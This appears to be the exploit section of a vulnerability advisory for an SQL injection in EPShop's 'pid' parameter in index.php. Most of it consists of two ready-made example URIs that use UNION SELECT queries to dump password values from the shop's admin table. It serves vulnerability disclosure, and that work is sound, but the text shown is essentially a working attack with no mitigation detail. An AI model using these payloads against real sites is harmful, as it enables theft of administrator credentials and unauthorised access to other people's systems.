• info
• discussion
• exploit
• solution
• references

EPShop 'pid' Parameter 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--

http://www.example.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--